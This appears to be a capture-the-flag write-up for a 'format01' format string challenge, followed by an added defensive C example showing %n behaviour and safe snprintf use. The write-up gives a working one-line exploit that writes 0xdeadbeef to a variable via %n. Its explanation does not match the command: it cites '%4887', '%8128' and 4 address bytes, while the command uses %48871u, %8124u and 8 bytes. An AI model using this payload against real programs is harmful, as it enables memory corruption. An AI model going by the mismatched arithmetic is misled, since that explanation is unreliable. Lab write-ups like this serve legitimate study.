Format-01
In this problem we have to modify a variable using only a format string vulnerability.
The exploit is:
    ./format01 $(python -c 'print "\x88\xd0\xff\xff"+"\x8a\xd0\xff\xff"+"%48871u"')%9\$n-%8124u-%10\$n
We use the %n specifier, which writes the number of bytes written so far to the address
selected by %<num>\$n (here %9\$n refers to our buffer, which points to the check variable).
%<number>u pads the number of bytes written.
Since 0xdeadbeef is a huge value to write, we split it into two 16-bit halves:
0xbeef (%4887) - 4, as we already have 4 bytes of addresses, and 0xdead (%8128) - 4.
And that's it: supply the payload and have fun :)
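
Added example, not part of the original writeup and not the source of format01 (which the page does not show): a small C program showing the %n behaviour described above, where the stored value is the count of characters produced so far, next to the corrected call that passes input as data. All function names and the sample string are made up for this illustration.

```c
#include <stdio.h>
#include <string.h>

/* %n stores how many characters the call has produced so far.
 * The format is a literal here, so the program (not the input) controls it. */
int count_after_padding(int pad) {
    char out[256];
    int written = -1;
    /* 4 literal bytes, then one unsigned padded to `pad` columns, then %n */
    snprintf(out, sizeof out, "AAAA%*u%n", pad, 1u, &written);
    return written;               /* always 4 + pad for pad >= 1 */
}

/* Vulnerable pattern (kept as a comment so it is never compiled in):
 *     printf(user_input);
 * Corrected pattern: untrusted text is passed as an argument, never as the format. */
int render_safely(const char *untrusted, char *out, size_t n) {
    return snprintf(out, n, "%s", untrusted);
}

/* Review/logging aid: does the string carry any conversion other than "%%"? */
int contains_conversion(const char *s) {
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }   /* escaped percent sign */
        return 1;
    }
    return 0;
}

int main(void) {
    char out[64];
    const char *sample = "%9$n-%x";           /* constructed sample input */
    printf("count after 4 + 12 pad: %d\n", count_after_padding(12));
    render_safely(sample, out, sizeof out);
    printf("rendered verbatim: %s (flagged: %d)\n", out, contains_conversion(sample));
    return 0;
}
```

Building with GCC's -Wformat -Wformat-security makes the compiler warn on the commented-out printf(user_input) pattern.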